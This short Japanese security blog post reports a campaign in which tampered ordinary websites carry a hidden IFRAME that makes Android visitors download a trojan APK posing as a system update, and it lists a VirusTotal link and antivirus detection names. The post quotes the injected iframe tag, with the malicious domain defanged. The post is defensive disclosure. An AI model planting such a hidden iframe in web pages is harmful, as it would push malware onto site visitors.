Androidマルウェア自動ダウンロード「androidczad info」改ざん被害



 たくさんの改ざんされた普通の一般サイトに不正なIFRAMEタグが第三者によって挿入され、アクセスしてきたユーザーが仮にAndroid端末だと、トロイの木馬なAPKファイルが端末に自動ダウンロードされてしまう手口。


・ gaoanalitics info サイト改ざん 約3,000件 2012年5月


その新しい攻撃を日本の一般サイトで確認。 



</html>
<iframe style="visibility: hidden; display: none; display: none;" src = "http // androidczad[.]info/"></iframe>


ダウンロードされたアプリ (update.apk) は、ユーザー手動でインストールしない限り感染状態とはならないということで、前回はアプリ名「com.Security.Update」を名乗ってたようですが、今回もイヤらしく「com.Android.Fixed.Update」となってます。もう先週から攻撃が始まってたみたい。


> www.virustotal.com/file/594035f1eb02b5e109c84d50f94403943bae8d73d1d9ccc4fce5542a2168cb25/analysis/1341907100/



  • Android:NotCom-A (avast!)

  • Android.Proxy.1.origin (Dr.Web)